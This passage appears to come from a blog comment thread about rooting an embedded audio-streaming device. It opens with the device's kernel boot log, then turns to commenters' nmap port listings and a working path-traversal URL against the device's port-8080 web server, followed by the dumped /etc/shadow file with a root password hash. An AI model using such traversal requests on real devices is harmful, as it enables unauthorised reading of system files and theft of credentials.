[ 7.744527] RTL871X: init_channel_set((null)) ChannelPlan ID:0x20, ch num:13
[ 7.745363] RTL871X: rtw_alloc_macid((null)) if2, hwaddr:ff:ff:ff:ff:ff:ff macid:1
[ 7.745463] RTL871X: rtw_wiphy_alloc(phy0)
[ 7.745475] RTL871X: rtw_wdev_alloc(padapter=d10c7000)
[ 7.745508] RTL871X: rtw_wiphy_alloc(phy1)
[ 7.745516] RTL871X: rtw_wdev_alloc(padapter=d1137000)
[ 7.745526] RTL871X: rtw_wiphy_register(phy0)
[ 7.745533] RTL871X: Register RTW cfg80211 vendor cmd(0x67) interface
[ 7.753591] RTL871X: rtw_ndev_init(wlan0) if1 mac_addr=00:09:xx:xx:xx
[ 7.758084] RTL871X: rtw_wiphy_register(phy1)
[ 7.758108] RTL871X: Register RTW cfg80211 vendor cmd(0x67) interface
[ 7.760891] RTL871X: rtw_ndev_init(wlan1) if2 mac_addr=02:09:b0:xx:xx:xx
[ 8.912933] Bluetooth: HCI UART driver ver 2.2
[ 8.912964] Bluetooth: HCI H4 protocol initialized
[ 8.912974] Bluetooth: HCI Realtek H5 protocol initialized
[ 8.912981] rtk_btcoex: rtk_uart_coex_init, version: 1.1
[ 8.912987] rtk_btcoex: create workqueue
[ 8.913951] Bluetooth: h5_open
[ 8.913969] Bluetooth: hci_uart_register_dev
[ 8.923840] rtk_btcoex: create udpsocket, connect_port: 30001
[ 8.923909] rtk_btcoex: send msg INVITE_REQ with len:11
[ 8.985265] rtk_btcoex: uart_coex_info.hci_reversion = 1e4d
[ 8.985291] rtk_btcoex: uart_coex_info.lmp_subversion = fa2c
[ 9.383190] tilcdc 4830e000.lcdc: timeout waiting for framedone
[ 12.418054] RTL871X: +871x_drv - drv_open, bup=0
[ 12.418282] RTL871X: _HalInit: REG_SYS_CLKR 0x09=0x30 REG_CR 0x100=0xea
[ 12.418293] RTL871X: _HalInit: MAC has not been powered on yet
[ 12.424134] RTL871X: SetHwReg8812A: bMacPwrCtrlOn=1
[ 12.424509] RTL871X: PowerOnCheck: REG_CR=(cmd52)0x0000063f (cmd53)0x0000063f, times=0
[ 12.424520] RTL871X: PowerOnCheck: 0x100 the result of cmd52 and cmd53 is the same.
[ 12.424607] RTL871X: PowerOnCheck: 0x1B8 test Pass.
[ 12.424616] RTL871X: Power on ok!
[ 12.445261] random: nonblocking pool is initialized
[ 12.450565] RTL871X: FirmwareDownload8812 fw source from Header
[ 12.450580] RTL871X: FirmwareDownload8812 fw:NIC-BTCOEX, size: 32706
[ 12.450591] RTL871X: FirmwareDownload8812: fw_ver=37 fw_subver=0 sig=0x2101
[ 12.753368] RTL871X: polling_fwdl_chksum: Checksum report OK! (1, 0ms), REG_MCUFWDL:0x07070305
[ 12.753709] RTL871X: =====> _8051Reset8812(): 8051 reset success .
[ 12.783390] RTL871X: _FWFreeToGo8812: Polling FW ready OK! (512, 30ms), REG_MCUFWDL:0x070702c6
[ 12.783409] RTL871X: FWDL success. write_fw:1, 340ms
[ 12.783420] RTL871X: _HalInit: Download Firmware Success
[ 12.785126] RTL871X: _init_available_page_threshold(): Enable Tx FIFO Page Threshold H:0x7676,N:0x7272,L:0x7676
[ 12.785207] RTL871X: _SetQueuePriority: BE=1 BK=1 VI=2 VO=3 MGT=3 HI=3
[ 12.912533] sched: RT throttling activated
[ 12.923831] RTL871X: HW_VAR_BASIC_RATE: 0x15f -> 0x15f -> 0x15f
[ 12.928016] RTL871X: +_InitAntenna_Selection
[ 12.928158] RTL871X: -_InitAntenna_Selection: Cur_ant:(2)AUX_ANT
[ 12.981831] RTL871X: pDM_Odm TxPowerTrackControl = 1
[ 12.981854] RTL871X: pDM_Odm TxPowerTrackControl = 1
[ 12.981962] RTL871X: hw_var_set_opmode()-4776 mode = 2
[ 12.982048] RTL871X: MAC Address = 00:09:b0:xx:xx:xx
[ 12.984361] RTL871X: rtw_cfg80211_init_wiphy:rf_type=3
[ 12.984387] RTL871X: [HT] HAL Support STBC = 0x01
[ 12.984396] RTL871X: [HT] HAL Support STBC = 0x01
[ 12.984449] RTL871X: +871x_drv - if2_open, bup=0
[ 12.984505] RTL871X: +XmitThread8821AS
[ 12.993174] RTL871X: rtw_cfg80211_init_wiphy:rf_type=3
[ 12.993194] RTL871X: [HT] HAL Support STBC = 0x01
[ 12.993202] RTL871X: [HT] HAL Support STBC = 0x01
[ 12.993243] RTL871X: -871x_drv - if2_open, bup=1
[ 12.993251] RTL871X: -871x_drv - drv_open, bup=1
[ 12.993360] RTL871X: cfg80211_rtw_set_power_mgmt(wlan0) enabled:1, timeout:-1
[ 12.995834] RTL871X: +XmitThread8821AS
[ 13.216517] RTL871X: cfg80211_rtw_flush_pmksa(wlan0)
[ 13.324392] net eth0: initializing cpsw version 1.12 (0)
[ 13.326145] libphy: PHY 4a101000.mdio:00 not found
[ 13.331152] net eth0: phy 4a101000.mdio:00 not found on slave 0
[ 13.413943] net eth0: phy found : id is : 0x221561
[ 13.875606] net eth0: initializing cpsw version 1.12 (0)
[ 13.877386] libphy: PHY 4a101000.mdio:00 not found
[ 13.885826] net eth0: phy 4a101000.mdio:00 not found on slave 0
[ 13.984268] net eth0: phy found : id is : 0x221561
[ 14.631877] RTL871X: cfg80211_rtw_set_power_mgmt(wlan0) enabled:0, timeout:-1
[ 14.643889] RTL871X: rtw_set_country_cmd country_code:"GB" mapping to chplan:0x26
[ 14.644010] RTL871X: init_channel_set(wlan0) ChannelPlan ID:0x26, ch num:32
[ 14.644038] RTL871X: _rtw_reg_notifier
[ 14.644071] RTL871X: _rtw_reg_notifier_apply: NL80211_REGDOM_SET_BY_DRIVER
[ 14.653757] RTL871X: rtw_ioctl_standard_wext_private:...
[ 14.653791] RTL871X: _rtw_ioctl_wext_private: cmd=mp_priv_ver
[ 14.653800] RTL871X: _rtw_ioctl_wext_private: parameters=H▒▒P▒▒P▒̜▒▒▒
[ 14.653828] RTL871X: mp_get MP_GETVER
[ 14.665229] RTL871X: rtw_ioctl_standard_wext_private:...
[ 14.665265] RTL871X: _rtw_ioctl_wext_private: cmd=mp_setrfpath
[ 14.665274] RTL871X: _rtw_ioctl_wext_private: parameters=1
[ 14.665300] RTL871X: set MP_SetRFPathSwitch
[ 14.665309] RTL871X: rtw_mp_SetRFPath:iwpriv in=1
[ 14.665627] RTL871X: rtw_mp_SetRFPath:PHY_SetRFPathSwitch=TRUE
[ 14.982578] RTL871X: IsBtDisabled=0, IsBtControlLps=0
[ 14.993507] RTL871X: _btmpoper_cmd: C2H status = BT_STATUS_BT_OP_SUCCESS
[ 14.993984] RTL871X: ==>rtw_ps_processor .fw_state(8)
[ 14.994221] RTL871X: ==>ips_enter cnts:1
[ 14.994230] RTL871X: nolinked power save enter
[ 14.994237] RTL871X: ===> rtw_ips_pwr_down...................
[ 14.994245] RTL871X: ====> rtw_ips_dev_unload...
[ 15.030549] RTL871X: =====> _8051Reset8812(): 8051 reset success .
[ 15.030630] RTL871X: SetHwReg8812A: bMacPwrCtrlOn=0
[ 15.031071] RTL871X: SetHwReg8812A: bMacPwrCtrlOn=0
[ 15.031083] RTL871X: <=== rtw_ips_pwr_down..................... in 30ms
[ 18.983305] cpsw 4a100000.ethernet eth0: Link is Up - 100Mbps/Full - flow control off
[71738.782142] tilcdc 4830e000.lcdc: timeout waiting for framedone
you may have notice that in the new firmware update, ssh is no longer present at the default port. the web-server on port 8080 has changed too. bummer, but perhaps they have moved to different, uncommon port. do you have any thoughts on that?
BeantwoordenVerwijderenI haven't updated yet...
BeantwoordenVerwijderenNmap portscan will give this detail.
Prior updating i'll try to add a hook to get in again, see if it survives an update
Does anyone have info on downgrading Firmware or getting access to this device?
BeantwoordenVerwijderenHoi Marcel,
BeantwoordenVerwijderenBen je hier nog verder meegegaan eigenlijk? Al geupgrae naar de nieuwe versie bijvoorbeeld?
Indeed... I've upgraded. as @Tymusz already found, ssh port is no longer open.
BeantwoordenVerwijderenOpen ports I found:
PORT STATE SERVICE VERSION
80/tcp open http thttpd 2.25b 29dec2003 -> webserver for websetup
4545/tcp open unknown -> streams json style status information
5000/tcp open rtsp Apple AirTunes rtspd 190.9 (Apple TV)
8080/tcp open http -> http server for clipart on http://192.168.x.xx:8080/index.fcgi
42897/tcp open unknown -> iTunes Radio streams
60128/tcp open iscp Onkyo A/V receiver ISCP
I guess the only way now to get root access is through internal serial port
there is still a vunarability that allows to access any file on the system:
BeantwoordenVerwijderene.g. http://192.168.X.XX:8080/..%2f..%2f..%2f..%2f..%2f..%2fetc/shadow
gives happyly
root:29e29cf30e68d3dAl9IDq74ErxeQXCj8upEYeDeeaYvEWGdOAnAF0T0la8iVmCtLJaF17v/MH5uJ1kUpQJxu.7HD..ClcLY4A3I.:16610:0:99999:7:::
daemon:*:16610:0:99999:7:::
bin:*:16610:0:99999:7:::
sys:*:16610:0:99999:7:::
sync:*:16610:0:99999:7:::
games:*:16610:0:99999:7:::
man:*:16610:0:99999:7:::
lp:*:16610:0:99999:7:::
mail:*:16610:0:99999:7:::
news:*:16610:0:99999:7:::
uucp:*:16610:0:99999:7:::
proxy:*:16610:0:99999:7:::
www-data:*:16610:0:99999:7:::
backup:*:16610:0:99999:7:::
list:*:16610:0:99999:7:::
irc:*:16610:0:99999:7:::
gnats:*:16610:0:99999:7:::
nobody:*:16610:0:99999:7:::
chrome:!:16610:0:99999:7:::
messagebus:!:16610:0:99999:7:::
ntp:!:16610:0:99999:7:::
avahi-autoipd:!:16610:0:99999:7:::